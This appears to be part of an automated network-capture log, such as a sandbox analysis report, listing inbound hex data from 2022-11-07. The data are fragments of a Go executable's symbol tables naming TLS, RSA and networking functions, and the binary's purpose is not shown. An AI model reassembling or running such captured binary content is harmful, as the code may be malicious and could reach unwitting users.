2022-11-07 22:48:54 UTC	3936	IN	Data Raw: 28 02 35 02 12 08 04 02 06 eb 04 40 ee 04 2a 87 05 40 8c 05 24 11 0a 02 15 e1 04 0a ea 04 08 07 05 02 6d 02 0a 07 0a 00 00 09 01 07 02 04 01 06 02 da 03 01 05 02 05 00 00 4e 04 2b 03 2c 04 2f 02 05 05 36 04 2f 02 1c 02 63 03 28 02 0f 05 0a 00 00 79 02 40 01 2a 04 40 03 43 02 0a 01 8e 01 00 00 00 00 00 a0 c9 4e 00 00 00 00 00 98 03 09 00 10 00 00 00 00 00 00 00 50 e3 03 00 a8 03 09 00 ad 03 09 00 02 00 00 00 00 00 00 02 d5 3d 06 00 c5 03 09 00 d8 a9 6f 00 00 00 00 00 30 a6 6f 00 00 00 00 00 66 6d 74 2e 28 2a 66 6d 74 29 2e 66 6d 74 43 00 de 03 bb 01 00 a0 07 28 0a 10 02 16 07 0c 08 16 02 04 09 02 0a 26 02 0a 01 0b 0d 0a 00 00 66 04 31 02 1a 05 0a 00 00 00 60 ca 4e 00 00 00 00 00 30 04 09 00 10 00 00 00 00 00 00 00 78 04 09 00 86 04 09 00 92 04 09 00 03 00 Data Ascii: (5@@$mN+,/6/c(y@@CNP=o0ofmt.(*fmt).fmtC(&f1`N0x
2022-11-07 22:48:54 UTC	3952	IN	Data Raw: 32 03 35 03 01 10 02 04 01 02 02 08 02 0e 04 06 01 02 36 03 05 04 04 07 04 06 02 0e 02 12 3b 05 28 01 00 00 7b 02 34 01 06 02 06 01 03 04 34 03 03 06 37 05 34 02 05 01 01 00 00 00 00 80 6c 4f 00 00 00 00 00 97 3b 09 00 10 00 00 00 00 00 00 00 90 43 09 00 9a 43 09 00 9f 43 09 00 03 00 00 00 00 00 00 05 00 00 00 00 b9 43 09 00 bf 43 09 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 0c 70 00 00 00 00 00 02 04 30 86 01 2f 01 30 1b 00 e6 03 a6 01 00 d4 03 0e 02 05 0a 0d 02 05 02 0a 06 11 02 05 02 0b 06 22 02 05 1f 14 1e 1b 00 00 93 01 04 13 00 00 13 02 64 01 14 02 1b 00 40 6d 4f 00 00 00 00 00 b4 3b 09 00 10 00 00 00 00 00 00 00 08 44 09 00 12 44 09 00 17 44 09 00 02 00 00 00 00 00 00 02 00 00 Data Ascii: 256;({4474lO;CCCCCoop0/0"d@mO;DDD
2022-11-07 22:48:54 UTC	3968	IN	Data Raw: 02 09 93 0f 09 92 0f 03 0e 14 01 0f 02 4d 04 53 11 08 8b 0f 06 04 27 96 0f 33 01 05 89 0f 28 8c 0f 25 01 0d 07 26 95 0f 05 fc 0e 03 b3 0e 0f c0 0e 22 c1 0e 0f 02 18 c0 0e 0f bf 0e 02 41 06 04 27 3e 1d 01 05 31 28 34 10 01 0d bc 0e 2a 91 0a 10 d2 09 05 d1 09 10 d2 09 05 50 08 91 0f 08 a0 0f 08 01 08 02 08 21 05 22 0c 23 0e 00 00 09 01 07 02 04 01 06 02 fd 07 01 05 02 09 00 00 bb 02 04 27 02 61 02 c2 01 07 5a 0a 3a 01 f8 01 01 06 05 0e 00 00 39 02 35 01 06 04 39 03 1c 06 09 05 ce 01 06 2d 05 38 06 28 05 58 0a 05 09 03 08 0f 07 22 08 27 07 0f 08 02 02 2d 01 22 02 28 01 1d 07 2a 04 10 01 05 02 10 01 05 01 08 06 08 05 37 00 00 00 00 00 c0 30 50 00 00 00 00 00 28 84 09 00 78 00 00 00 00 00 00 00 3b 84 09 00 6d 84 09 00 7b 84 09 00 03 00 00 00 00 00 00 05 4a 86 Data Ascii: MS'3(%&"A'>1(4P!"#'aZ:959-8(X"'-"(70P(x;m{J
2022-11-07 22:48:54 UTC	3984	IN	Data Raw: 09 01 07 02 09 01 06 02 c2 04 01 05 02 05 00 00 df 01 02 f1 02 01 1b 00 00 00 00 00 00 e0 f0 50 00 00 00 00 00 50 c3 09 00 28 00 00 00 00 00 00 00 6d c3 09 00 7e c3 09 00 83 c3 09 00 02 00 00 00 00 00 00 02 a1 c3 09 00 b1 c3 09 00 94 c7 6f 00 00 00 00 00 84 c1 6f 00 00 00 00 00 63 72 79 70 74 6f 2f 65 6c 6c 69 70 74 69 63 2e 70 32 32 34 54 6f 41 66 66 69 6e 65 00 02 31 d0 04 e0 01 cf 04 01 d0 04 df 02 cf 04 0b 00 f8 03 fc 04 00 e6 0a 41 02 31 02 2b 04 18 02 5d 06 1b 02 25 02 2d 02 2a 02 2d 04 1e 02 1b 02 63 1f 0a 00 00 09 01 07 02 14 01 06 02 c8 04 01 05 02 05 00 00 a9 01 02 17 02 1d 02 4b 02 c7 01 02 1b 05 31 02 37 05 0a 00 00 00 60 f3 50 00 00 00 00 00 00 c4 09 00 40 00 00 00 00 00 00 00 95 e5 02 00 21 c4 09 00 26 c4 09 00 00 00 00 00 00 00 00 02 8c 9e Data Ascii: PP(m~oocrypto/elliptic.p224ToAffine1A1+]%-*-cK17`P@!&
2022-11-07 22:48:54 UTC	4000	IN	Data Raw: 02 03 02 06 04 03 02 03 02 06 02 03 04 03 02 03 02 06 04 03 02 03 02 03 02 03 04 03 02 03 02 03 04 03 04 03 02 03 04 05 02 05 02 04 04 05 02 04 04 04 04 06 04 08 04 06 02 05 04 03 02 06 02 06 02 05 02 03 04 03 02 06 02 03 02 03 04 06 02 03 02 06 02 03 02 03 04 03 02 03 04 06 02 03 04 03 02 03 02 03 02 03 04 03 02 03 04 03 02 03 02 03 04 05 02 05 02 04 02 04 02 05 02 05 02 04 02 04 04 05 04 05 04 03 02 06 02 05 04 06 02 03 02 03 02 03 04 06 02 03 02 03 04 06 02 03 02 03 04 03 02 06 02 03 04 03 02 06 04 03 02 03 02 03 02 03 04 03 02 03 02 03 02 03 04 03 04 05 02 05 02 04 02 04 02 05 02 05 02 04 02 04 04 05 04 06 04 03 02 06 02 06 02 05 02 03 04 03 02 06 02 03 02 03 04 06 02 03 02 03 02 03 04 03 02 03 04 06 02 03 04 03 02 03 04 06 04 03 02 03 02 03 02 03 04 Data Ascii:
2022-11-07 22:48:54 UTC	4016	IN	Data Raw: 00 00 00 00 00 50 43 0a 00 68 00 00 00 00 00 00 00 c7 43 0a 00 83 44 0a 00 cf 44 0a 00 03 00 00 00 00 00 00 05 34 46 0a 00 56 46 0a 00 c7 46 0a 00 00 00 00 00 7c 84 70 00 00 00 00 00 c4 1a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 66 73 00 00 00 00 00 d4 09 72 00 00 00 00 00 65 6e 63 6f 64 69 6e 67 2f 61 73 6e 31 2e 6d 61 6b 65 42 6f 64 79 00 65 6e 63 6f 64 69 6e 67 2f 61 73 6e 31 2e 6d 61 6b 65 55 54 46 38 53 74 72 69 6e 67 00 65 6e 63 6f 64 69 6e 67 2f 61 73 6e 31 2e 73 74 72 69 70 54 61 67 41 6e 64 4c 65 6e 67 74 68 00 65 6e 63 6f 64 69 6e 67 2f 61 73 6e 31 2e 6d 61 6b 65 4f 62 6a 65 63 74 49 64 65 6e 74 69 66 69 65 72 00 02 31 b0 08 af 02 af 08 01 b0 08 94 01 af 08 01 b0 08 64 af 08 01 b0 08 38 af 08 01 b0 08 ba 01 af 08 01 b0 08 71 af 08 01 b0 08 Data Ascii: PChCDD4FVFF\|pqfsrencoding/asn1.makeBodyencoding/asn1.makeUTF8Stringencoding/asn1.stripTagAndLengthencoding/asn1.makeObjectIdentifier1d8q
2022-11-07 22:48:54 UTC	4032	IN	Data Raw: 41 53 4e 31 00 02 1e 80 02 c4 01 ff 01 01 80 02 69 ff 01 01 80 02 78 ff 01 0a 00 92 04 cf 03 00 a8 05 28 04 34 02 11 04 27 02 28 02 11 04 04 04 12 01 06 07 02 0e 62 09 38 02 3b 05 05 0b 0a 00 00 09 01 07 02 04 01 06 02 ab 03 01 05 02 05 00 00 33 02 1a 02 5f 02 86 01 02 3a 02 59 09 0a 00 00 00 00 00 00 e0 11 53 00 00 00 00 00 98 83 0a 00 38 00 00 00 00 00 00 00 b0 83 0a 00 bb 83 0a 00 bf 83 0a 00 02 00 00 00 00 00 00 02 8b 61 05 00 cf 83 0a 00 a8 a0 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 63 72 79 70 74 6f 2f 65 63 64 73 61 2e 28 2a 7a 72 29 2e 52 65 61 64 00 02 1a 30 2a 2f 01 30 1a 2f 08 00 92 04 67 00 d2 05 24 02 0a 06 17 05 13 06 05 05 02 01 08 00 00 53 02 0c 01 08 00 00 00 60 12 53 00 00 00 00 00 18 84 0a 00 08 00 00 00 00 00 00 00 3e 84 0a 00 45 84 Data Ascii: ASN1ix(4'(b8;3_:YS8aoocrypto/ecdsa.(zr).Read0/0/g$S`S>E
2022-11-07 22:48:54 UTC	4048	IN	Data Raw: 01 06 02 fc 01 01 05 02 23 00 00 bd 01 04 59 03 28 00 00 00 00 e0 ac 53 00 00 00 00 00 68 c3 0a 00 58 00 00 00 00 00 00 00 b4 c3 0a 00 d6 c3 0a 00 fd c3 0a 00 03 00 00 00 00 00 00 05 5b c4 0a 00 6b c4 0a 00 86 c4 0a 00 00 00 00 00 90 2b 70 00 00 00 00 00 bc 2c 70 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a8 73 00 00 00 00 00 54 38 71 00 00 00 00 00 63 72 79 70 74 6f 2f 72 73 61 2e 45 6e 63 72 79 70 74 50 4b 43 53 31 76 31 35 00 63 72 79 70 74 6f 2f 72 73 61 2e 63 68 65 63 6b 50 75 62 00 63 72 79 70 74 6f 2f 72 73 61 2e 28 2a 50 75 62 6c 69 63 4b 65 79 29 2e 53 69 7a 65 00 02 26 d0 02 80 06 cf 02 01 d0 02 58 cf 02 02 d0 02 44 cf 02 01 d0 02 3d cf 02 01 d0 02 6c cf 02 0a 00 a0 04 54 02 23 01 18 35 08 02 32 36 18 01 15 02 05 01 b2 02 35 50 36 bd 01 35 0a 36 Data Ascii: #Y(ShX[k+p,psT8qcrypto/rsa.EncryptPKCS1v15crypto/rsa.checkPubcrypto/rsa.(*PublicKey).Size&XD=lT#5265P656
2022-11-07 22:48:54 UTC	4064	IN	Data Raw: 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 6b 70 00 00 00 00 00 63 72 79 70 74 6f 2f 73 68 61 32 35 36 2e 69 6e 69 74 2e 30 00 02 1e 30 65 2f 01 30 39 2f 0d 00 b4 04 2f 87 01 4b 88 01 0a 87 01 39 88 01 0d 00 22 28 02 07 88 02 4b 85 02 0a 86 02 39 89 02 0d 00 00 09 01 07 02 04 01 06 02 22 01 14 02 16 01 14 02 0a 01 24 02 15 01 08 02 05 00 00 ad 01 02 10 01 0d 00 00 2f 02 21 02 2a 03 0a 04 12 01 12 02 0a 01 0b 01 0d 00 00 80 6d 54 00 00 00 00 00 f8 03 0b 00 30 00 00 00 00 00 00 00 39 04 0b 00 4a 04 0b 00 6f 04 0b 00 03 00 00 00 00 00 00 05 01 05 0b 00 11 05 0b 00 24 05 0b 00 00 00 00 00 88 a8 6f 00 00 00 00 00 30 a6 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 46 Data Ascii: ooTkpcrypto/sha256.init.00e/09//K9"(K9"$/!*mT09Jo$o0opF
2022-11-07 22:48:54 UTC	4080	IN	Data Raw: 2e 28 2a 49 50 41 64 64 72 29 2e 69 73 57 69 6c 64 63 61 72 64 00 02 31 90 04 86 04 8f 04 01 90 04 99 02 8f 04 01 90 04 6e 8f 04 01 90 04 b1 02 8f 04 01 90 04 bc 06 8f 04 01 90 04 60 8f 04 01 90 04 bc 0c 8f 04 01 90 04 a8 05 8f 04 01 90 04 59 8f 04 0b 00 ca 04 87 02 02 79 01 cf 01 02 15 01 dd 02 02 17 01 08 02 33 01 05 02 3e 01 93 02 04 27 03 c2 07 04 22 03 64 04 18 03 cf 02 06 22 05 64 06 18 05 c2 02 08 22 07 64 08 18 07 af 02 04 19 03 68 06 23 05 17 06 19 05 5c 08 23 07 17 08 19 07 ec 02 00 96 03 41 02 51 02 09 06 45 06 0a 02 0c 01 04 0d 0d a1 02 06 02 0c 02 67 b2 02 09 01 08 09 0c 12 2c 06 82 01 05 04 f3 02 15 f4 02 34 02 cf 01 01 23 03 37 b3 02 17 b0 02 08 af 02 17 04 1c ac 02 05 b3 02 06 02 15 01 06 02 1d c4 02 60 02 05 02 38 1f 11 1e 21 01 08 14 06 Data Ascii: .(*IPAddr).isWildcard1n`Yy3>'"d"d"dh#\#AQEg,4#7`8!
2022-11-07 22:48:54 UTC	4096	IN	Data Raw: 01 01 c0 01 3b bf 01 0a 00 e8 04 b0 03 00 7e 28 02 0d 02 2b 02 25 02 3d 02 11 02 7e 04 1a 0b 13 06 05 03 05 01 05 08 05 09 03 02 05 02 0c 05 0a 00 00 09 01 07 02 04 01 06 02 eb 01 01 12 02 2a 01 10 02 55 01 05 02 05 00 00 7c 02 a3 02 02 07 03 0a 00 00 00 c0 ff 55 00 00 00 00 00 88 83 0b 00 38 00 00 00 00 00 00 00 9a 83 0b 00 b1 83 0b 00 b6 83 0b 00 02 00 00 00 00 00 00 02 f5 83 0b 00 0e 84 0b 00 54 bb 6f 00 00 00 00 00 80 b3 6f 00 00 00 00 00 6e 65 74 2e 6c 6f 6f 6b 75 70 50 6f 72 74 4d 61 70 00 02 26 90 02 8a 04 8f 02 01 90 02 2d 8f 02 01 90 02 e7 01 8f 02 0a 00 e8 04 d0 06 00 a2 01 36 02 14 0e 56 02 0d 02 33 02 25 02 57 08 e0 01 05 23 06 08 07 05 03 13 04 05 01 05 02 08 03 05 0c 08 0d 03 02 05 11 33 02 1c 02 05 01 08 0c 08 0d 05 06 1c 02 05 01 0a 0e 0c Data Ascii: ;~(+%=~*U\|U8Toonet.lookupPortMap&-6V3%W#3
2022-11-07 22:48:54 UTC	4112	IN	Data Raw: 64 64 72 29 2e 69 73 57 69 6c 64 63 61 72 64 00 cc 04 1e 00 54 1e 00 00 00 00 00 00 00 c0 93 56 00 00 00 00 00 70 c3 0b 00 70 00 00 00 00 00 00 00 7f c3 0b 00 a9 c3 0b 00 bb c3 0b 00 03 00 00 00 00 00 00 05 30 c4 0b 00 49 c4 0b 00 5f c4 0b 00 00 00 00 00 70 f1 6f 00 00 00 00 00 b4 c5 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 14 70 00 00 00 00 00 6e 65 74 2e 75 6e 69 78 53 6f 63 6b 65 74 00 02 26 e0 02 d8 02 df 02 01 e0 02 22 df 02 01 e0 02 3f df 02 01 e0 02 a7 03 df 02 01 e0 02 b2 01 df 02 01 e0 02 72 df 02 0a 00 88 05 a2 06 a9 03 35 aa 03 33 a9 03 0f aa 03 a0 02 00 22 36 04 14 02 19 14 12 02 14 0e 08 0b 18 0c 08 05 18 06 11 10 74 02 05 02 2c 04 23 17 06 02 3a 01 1b 05 19 16 10 0f 10 10 0d 15 05 16 10 0f 10 10 08 0f 08 05 05 05 Data Ascii: ddr).isWildcardTVpp0I_poopnet.unixSocket&"?r53"6t,#:
2022-11-07 22:48:54 UTC	4128	IN	Data Raw: 07 02 09 01 06 02 f4 0c 01 05 02 05 00 00 7a 02 65 02 3c 01 bc 01 04 66 02 89 01 02 c8 02 02 54 01 3a 09 0b 0a 74 07 5f 0c 31 01 54 01 5c 07 1c 08 1c 09 0a 00 00 40 02 0c 01 d0 08 04 27 03 f7 02 02 30 01 08 02 05 01 26 00 00 00 00 20 18 57 00 00 00 00 00 80 03 0c 00 28 00 00 00 00 00 00 00 97 03 0c 00 a6 03 0c 00 ab 03 0c 00 02 00 00 00 00 00 00 02 cb 03 0c 00 ee 03 0c 00 ac 9f 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6e 65 74 2f 75 72 6c 2e 28 2a 55 52 4c 29 2e 73 65 74 50 61 74 68 00 02 1e 80 01 b9 01 7f 01 80 01 8e 01 7f 0b 00 8c 05 f1 02 00 ca 0a 28 02 38 02 09 06 1a 02 28 08 1b 04 12 03 10 07 24 04 2d 04 07 07 05 01 0e 03 14 05 0a 00 00 09 01 07 02 04 01 06 02 58 01 11 02 31 01 12 02 12 01 10 02 31 01 20 02 0c 01 0e 02 14 01 05 02 05 00 00 44 02 a3 Data Ascii: ze<fT:t_1T\@'0& W(oonet/url.(*URL).setPath(8($-X11 D
2022-11-07 22:48:54 UTC	4144	IN	Data Raw: 00 00 00 00 00 30 a6 6f 00 00 00 00 00 63 72 79 70 74 6f 2f 78 35 30 39 2e 65 78 74 4b 65 79 55 73 61 67 65 46 72 6f 6d 4f 49 44 00 02 1e c0 01 be 01 bf 01 01 c0 01 1e bf 01 0f 00 92 05 8a 02 00 86 0a 28 02 4d 02 38 01 12 0a 1e 05 1f 05 0e 00 00 a1 01 04 5b 03 0e 00 00 00 00 00 e0 cd 57 00 00 00 00 00 a0 43 0c 00 18 00 00 00 00 00 00 00 c9 43 0c 00 d3 43 0c 00 d8 43 0c 00 02 00 00 00 00 00 00 04 8c 59 05 00 e0 43 0c 00 0c 9d 6f 00 00 00 00 00 2c 9e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 30 65 73 00 00 00 00 00 63 72 79 70 74 6f 2f 78 35 30 39 2e 49 6e 73 65 63 75 72 65 41 6c 67 6f 72 69 74 68 6d 45 72 72 6f 72 2e 45 72 72 6f 72 00 02 1e a0 01 88 01 9f 01 0b 00 92 05 b1 01 00 84 0c 28 02 7f 01 0a 00 00 39 04 4b 01 23 01 0a 00 00 00 00 00 00 00 00 a0 ce Data Ascii: 0ocrypto/x509.extKeyUsageFromOID(M8[WCCCCYCo,o0escrypto/x509.InsecureAlgorithmError.Error(9K#
2022-11-07 22:48:54 UTC	4160	IN	Data Raw: 70 6f 6c 79 31 33 30 35 2e 28 2a 63 68 61 63 68 61 32 30 70 6f 6c 79 31 33 30 35 29 2e 4f 70 65 6e 00 02 26 b0 02 bc 02 af 02 01 b0 02 44 af 02 01 b0 02 3e af 02 0a 00 b0 05 f0 03 00 88 01 36 02 14 06 12 06 13 08 f4 01 0b 45 06 1d 0b 21 03 0a 00 00 87 02 04 df 01 03 0a 00 00 00 20 7d 58 00 00 00 00 00 b0 83 0c 00 28 00 00 00 00 00 00 00 e7 83 0c 00 f1 83 0c 00 31 84 0c 00 03 00 00 00 00 00 00 05 00 00 00 00 72 84 0c 00 78 84 0c 00 00 00 00 00 58 9f 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c d6 71 00 00 00 00 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 63 72 79 70 74 6f 2f 63 68 61 63 68 61 32 30 70 6f 6c 79 31 33 30 35 2e 73 65 74 75 70 53 74 61 74 65 00 02 04 30 9d 01 2f 01 30 24 00 b2 Data Ascii: poly1305.(*chacha20poly1305).Open&D>6E! }X(1rxXooqvendor/golang.org/x/crypto/chacha20poly1305.setupState0/0$
2022-11-07 22:48:54 UTC	4176	IN	Data Raw: 00 00 00 00 00 50 c3 0c 00 40 00 00 00 00 00 00 00 71 c3 0c 00 87 c3 0c 00 92 c3 0c 00 03 00 00 00 00 00 00 05 ba c3 0c 00 ca c3 0c 00 d9 c3 0c 00 00 00 00 00 00 a9 6f 00 00 00 00 00 30 a6 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 16 70 00 00 00 00 00 63 72 79 70 74 6f 2f 74 6c 73 2e 73 65 6c 65 63 74 53 69 67 6e 61 74 75 72 65 53 63 68 65 6d 65 00 02 1e b0 01 89 02 af 01 01 b0 01 51 af 01 01 b0 01 46 af 01 0b 00 c4 05 a8 02 e5 03 27 e6 03 7c 00 d0 03 28 02 2c 02 09 06 1e 06 1a 08 0a 15 11 16 0b 02 0f 01 1d 02 1f 02 22 f3 02 27 fa 02 2b 09 06 0d 05 03 3c 05 0a 00 00 09 01 07 02 04 01 06 02 a7 03 01 05 02 05 00 00 3b 02 bf 01 02 2e 03 0b 06 8e 01 05 0a 00 00 a8 02 02 27 01 7c 00 00 00 00 00 00 00 00 00 81 59 00 00 00 00 00 48 c4 Data Ascii: P@qo0oxpcrypto/tls.selectSignatureSchemeQF'\|(,"'+<;.'\|YH
2022-11-07 22:48:54 UTC	4192	IN	Data Raw: 0e 00 00 80 02 02 04 01 f1 01 04 14 03 9c 03 02 2c 01 1a 02 05 01 b5 02 00 00 00 00 00 40 22 5a 00 00 00 00 00 78 03 0d 00 40 00 00 00 26 01 00 00 97 03 0d 00 a7 03 0d 00 b8 03 0d 00 03 00 00 00 00 00 00 06 d5 03 0d 00 e5 03 0d 00 f1 03 0d 00 00 00 00 00 b4 a9 6f 00 00 00 00 00 14 a7 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 17 70 00 00 00 00 00 28 99 6f 00 00 00 00 00 63 72 79 70 74 6f 2f 74 6c 73 2e 28 2a 43 6f 6e 6e 29 2e 77 72 69 74 65 52 65 63 6f 72 64 00 02 1e d0 01 ea 01 cf 01 01 d0 01 2b cf 01 0b 00 cc 05 6a e5 03 08 e6 03 9c 01 e5 03 09 e6 03 28 00 ac 0f 4c 02 1e 97 0e 08 9a 0e 16 04 81 01 05 05 89 0e 09 90 0e 05 03 05 01 14 01 0a 00 00 09 01 07 02 04 01 06 02 9b 02 01 05 02 05 00 00 bc 01 04 56 02 14 01 0f 03 0a 00 00 Data Ascii: ,@"Zx@&oop(ocrypto/tls.(*Conn).writeRecord+j(LV
2022-11-07 22:48:54 UTC	4208	IN	Data Raw: 00 f3 44 0d 00 2d 45 0d 00 00 00 00 00 ec 2e 70 00 00 00 00 00 0c c1 70 00 00 00 00 00 00 00 00 00 00 00 00 00 90 5f 73 00 00 00 00 00 e4 68 71 00 00 00 00 00 63 72 79 70 74 6f 2f 74 6c 73 2e 28 2a 63 6c 69 65 6e 74 48 61 6e 64 73 68 61 6b 65 53 74 61 74 65 54 4c 53 31 33 29 2e 72 65 61 64 53 65 72 76 65 72 43 65 72 74 69 66 69 63 61 74 65 00 02 31 a0 08 52 9f 08 01 a0 08 e2 01 9f 08 01 a0 08 d2 04 9f 08 01 a0 08 f0 03 9f 08 01 a0 08 57 9f 08 01 a0 08 3f 9f 08 01 a0 08 63 9f 08 01 a0 08 d9 01 9f 08 01 a0 08 2c 9f 08 01 a0 08 1f 9f 08 01 a0 08 84 01 9f 08 01 a0 08 db 01 9f 08 01 a0 08 a9 01 9f 08 01 a0 08 4b 9f 08 01 a0 08 0b 9f 08 0a 00 d4 05 ec 06 f5 03 27 f6 03 bc 03 f5 03 35 f6 03 27 f5 03 0f f6 03 9f 01 f5 03 27 f6 03 4d 0b 94 01 0c 20 0b 08 0c 7c f5 Data Ascii: D-E.pp_shqcrypto/tls.(*clientHandshakeStateTLS13).readServerCertificate1RW?c,K'5''M \|
2022-11-07 22:48:54 UTC	4224	IN	Data Raw: 0c 06 2f 02 16 02 20 02 14 02 0d 04 16 0b 05 0c 03 04 2d 02 28 04 0a 02 04 02 09 01 03 02 12 02 0f 02 15 02 0c 04 04 03 03 06 15 03 03 01 11 02 14 02 0c 0a 20 02 0e 02 15 02 21 02 03 01 07 02 13 02 0e 02 04 02 0a 01 11 02 08 02 06 09 04 0a 13 09 05 10 14 02 22 01 07 0f 0f 06 0a 02 24 08 05 0f 05 0a 05 06 05 0f 05 10 08 0f 05 08 05 0d 03 17 05 05 13 02 12 01 07 21 05 0b 22 5c 0d 05 0d 01 0a 05 0d 01 0a 09 12 01 0a 05 0d 01 0a 07 08 05 0a 03 0d 01 0a 01 0a 01 0d 23 0a 00 00 09 01 07 02 04 01 06 02 86 06 01 0c 02 22 01 07 02 f1 02 01 05 02 05 00 00 be 01 02 b8 04 01 86 01 04 57 02 4b 02 a8 01 07 0a 00 00 00 00 40 95 5b 00 00 00 00 00 00 84 0d 00 28 00 00 00 00 00 00 00 2e 84 0d 00 80 84 0d 00 85 84 0d 00 02 00 00 00 00 00 00 02 3d 85 0d 00 7d 85 0d 00 ac a5 Data Ascii: / -( !"$!"\#"WK@[(.=}
2022-11-07 22:48:54 UTC	4240	IN	Data Raw: 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 0c 9d 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 60 73 00 00 00 00 00 d0 18 70 00 00 00 00 00 63 72 79 70 74 6f 2f 74 6c 73 2e 28 2a 63 6c 69 65 6e 74 48 65 6c 6c 6f 4d 73 67 29 2e 6d 61 72 73 68 61 6c 2e 66 75 6e 63 31 2e 34 2e 34 00 c0 02 28 02 19 2f 26 30 0a 01 07 00 00 00 00 00 00 a0 26 5c 00 00 00 00 00 c0 c3 0d 00 08 00 00 00 00 00 00 00 41 c2 0d 00 51 c2 0d 00 ef c3 0d 00 03 00 00 00 00 00 00 05 26 b7 0d 00 47 b7 0d 00 a2 c2 0d 00 00 00 00 00 38 ad 6f 00 00 00 00 00 28 ae 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 71 00 00 00 00 00 63 72 79 70 74 6f 2f 74 6c 73 2e 28 2a 63 6c 69 65 6e 74 48 65 6c 6c 6f 4d 73 67 29 2e 6d 61 72 73 68 61 6c 2e 66 75 6e 63 31 2e 34 2e 35 00 d2 02 2c Data Ascii: oo`spcrypto/tls.(clientHelloMsg).marshal.func1.4.4(/&0&\AQ&G8o(oqcrypto/tls.(clientHelloMsg).marshal.func1.4.5,
2022-11-07 22:48:54 UTC	4256	IN	Data Raw: 00 00 00 00 05 c4 ba 0d 00 64 ea 0d 00 7c ea 0d 00 00 00 00 00 38 ad 6f 00 00 00 00 00 28 ae 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 07 71 00 00 00 00 00 63 72 79 70 74 6f 2f 74 6c 73 2e 28 2a 65 6e 63 72 79 70 74 65 64 45 78 74 65 6e 73 69 6f 6e 73 4d 73 67 29 2e 6d 61 72 73 68 61 6c 2e 66 75 6e 63 31 2e 31 2e 31 2e 31 2e 31 00 ba 0d 3a 02 2a ff 08 0e f1 02 10 f8 02 0b fa 08 0a f3 08 12 06 21 08 73 0d 04 0e 59 dd 03 27 d8 03 32 d7 03 29 d2 03 1f 04 05 08 05 0b 10 05 1d f6 08 0a 00 00 80 bd 5c 00 00 00 00 00 00 04 0e 00 08 00 00 00 00 00 00 00 58 49 04 00 37 bd 0d 00 39 04 0e 00 03 00 00 00 00 00 00 05 43 38 09 00 4d bd 0d 00 54 bd 0d 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 0c 9d 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 61 Data Ascii: d\|8o(oqcrypto/tls.(encryptedExtensionsMsg).marshal.func1.1.1.1.1:!sY'2)\XI79C8MTooa
2022-11-07 22:48:55 UTC	4272	IN	Data Raw: 03 10 06 02 0a 07 13 02 0a 01 0b 0e 1f 02 0a 01 0b 2f 16 02 05 01 05 1a 28 03 08 09 21 0b 0b 05 0a 00 00 09 01 07 02 04 01 06 02 bd 02 01 0f 02 0a 01 0b 02 12 01 0d 02 0a 01 0b 02 7c 01 05 02 05 00 00 88 02 02 41 01 74 02 35 02 39 03 0a 00 00 00 00 00 00 60 44 5d 00 00 00 00 00 a8 43 0e 00 38 00 00 00 00 00 00 00 d5 43 0e 00 ea 43 0e 00 ef 43 0e 00 03 00 00 00 00 00 00 05 21 44 0e 00 39 44 0e 00 46 44 0e 00 00 00 00 00 20 9e 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 1b 70 00 00 00 00 00 62 75 66 69 6f 2e 28 2a 52 65 61 64 65 72 29 2e 50 65 65 6b 00 62 75 66 69 6f 2e 28 2a 52 65 61 64 65 72 29 2e 72 65 61 64 45 72 72 00 02 1e 30 cf 01 2f 01 30 87 01 2f 01 30 61 2f 01 30 26 2f 0c 00 de 05 8a 04 00 86 02 28 Data Ascii: /(!\|At59`D]C8CCC!D9DFD ooxpbufio.(Reader).Peekbufio.(Reader).readErr0/0/0a/0&/(
2022-11-07 22:48:55 UTC	4288	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 b3 70 00 00 00 00 00 63 6f 6d 70 72 65 73 73 2f 66 6c 61 74 65 2e 28 2a 68 75 66 66 6d 61 6e 45 6e 63 6f 64 65 72 29 2e 61 73 73 69 67 6e 45 6e 63 6f 64 69 6e 67 41 6e 64 53 69 7a 65 00 63 6f 6d 70 72 65 73 73 2f 66 6c 61 74 65 2e 28 2a 62 79 4c 69 74 65 72 61 6c 29 2e 73 6f 72 74 00 02 1e 70 84 03 6f 01 70 17 6f 0b 00 fe 05 c9 02 db 02 26 dc 02 56 00 f2 03 28 04 25 02 02 02 0a 0e 12 11 05 12 05 0f 05 10 08 04 0c 03 08 74 07 73 1b 04 04 70 11 02 18 6f 1d 02 0d 01 03 04 04 a8 01 03 ab 01 05 ac 01 0e ab 01 08 02 07 19 03 c4 01 0b e3 01 26 3a 07 19 0d 02 02 10 05 0e 05 66 0a 85 01 0a 1a 0b 07 0c 15 0b 00 00 09 01 07 02 04 01 06 02 a2 01 01 11 02 c2 01 01 0a 02 21 01 05 02 06 00 00 dd 01 04 bc Data Ascii: @pcompress/flate.(huffmanEncoder).assignEncodingAndSizecompress/flate.(byLiteral).sortpopo&V(%tspo&:f!
